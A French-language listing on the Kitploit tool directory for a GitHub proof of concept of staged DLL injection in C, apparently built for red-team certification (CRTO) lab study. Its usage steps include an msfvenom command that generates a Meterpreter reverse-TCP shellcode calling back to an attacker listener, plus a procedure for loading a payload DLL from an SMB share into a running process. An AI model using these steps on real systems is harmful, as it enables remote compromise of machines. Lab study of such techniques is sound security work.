Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
staged-DLL-Injection-SMB- — Injection DLL par étapes - preuve de concept construite en C utilisant les API Win32 — développée dans un environnement de laboratoire isolé pour l'étude de certification red team (CRTO). | Kitploit
Outils/GitHubGitHub/kasturixbm5/staged-dll-injection-smb-
ExploitationShellcodeTests d'IntrusionApprentissage et ÉducationRed TeamingGénération de ShellcodeDéveloppement de Charges UtilesLabs et Pratique
GitHub
kasturixbm5/staged-dll-injection-smb-

staged-DLL-Injection-SMB-

Injection DLL par étapes - preuve de concept construite en C utilisant les API Win32 — développée dans un environnement de laboratoire isolé pour l'étude de certification red team (CRTO).

Voir le dépôt
42850il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

staged-DLL-Injection

Preuve de concept d'injection DLL par étapes (staged) écrite en C à l'aide des API Win32 — développée dans un environnement de laboratoire isolé pour l'étude de la certification d'équipe rouge (CRTO).

⚠️ Avertissement : Ce projet a été développé strictement dans un environnement de laboratoire isolé à des fins éducatives dans le cadre de la recherche offensive en sécurité et de l'étude de certification (CRTO). Il n'est pas destiné à être utilisé contre des systèmes sans autorisation écrite explicite. Toute utilisation non autorisée est illégale et contraire à l'éthique.

Aperçu

Une preuve de concept d'injection DLL par étapes sur Windows, construite dans le cadre d'études de certification d'équipe rouge. Ce projet montre comment un stager peut charger à distance une DLL malveillante dans un processus cible en utilisant les API natives Win32. Fonctionne mieux dans un environnement Active Directory qui autorise le trafic SMB au sein du réseau interne ; déconseillé pour une utilisation sur Internet.

Utilisation

root@kitploit:~
1. Construire une shellcode avec msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtenir la shellcode brute et la convertir en tableau C
xxd -i payload.bin > payload.h
3. Copier la shellcode et la coller sous le tableau unsigned char payload_bin[] {xxxxx} dans maindll.c
4. Modifier phc.c pour pointer l'adresse vers votre IP dans dllPath[]
5. Compiler phc.c en .exe, et compiler maindll.c en fichier .dll
6. Héberger le serveur SMB et placer maindll.dll
7. Configurer l'écouteur
8. Ouvrir Notepad.exe et trouver le PID
9. Exécuter phc.exe <PID>

Fonctionnement

Stager (phc.c)

  • Accepte un PID de processus cible comme argument de ligne de commande
  • Ouvre un handle sur le processus cible via OpenProcess
  • Alloue de la mémoire dans le processus cible via VirtualAlloc
  • Récupère l'adresse de LoadLibraryW depuis Kernel32
  • Crée un thread distant via CreateRemoteThread qui appelle LoadLibraryW, chargeant la DLL depuis un partage SMB distant

DLL (maindll.dll)

  • Contient une charge utile (shellcode) intégrée
  • DllMain se déclenche automatiquement sur DLL_PROCESS_ATTACH
  • Alloue de la mémoire exécutable via VirtualAlloc
  • Copie la shellcode en mémoire et l'exécute via CreateThread

Flux d'attaque

phc.exe → Ouvre le processus cible → Alloue de la mémoire dans le processus cible → Charge maindll.dll depuis un partage SMB via LoadLibraryW → DllMain se déclenche → La shellcode est exécutée dans le processus cible

Techniques démontrées

  • Injection DLL distante via CreateRemoteThread + LoadLibraryW
  • Intégration et exécution de shellcode en C
  • Abus du point d'entrée DLL via DllMain
  • Mise en scène de charge utile à distance via SMB

Construit avec

  • C
  • API Win32
  • msfvenom
  • Sliver C2

Environnement

Testé sur Windows 10 dans un environnement de laboratoire isolé. Écouteur C2 hébergé sur Kali Linux.

Télécharger l’outil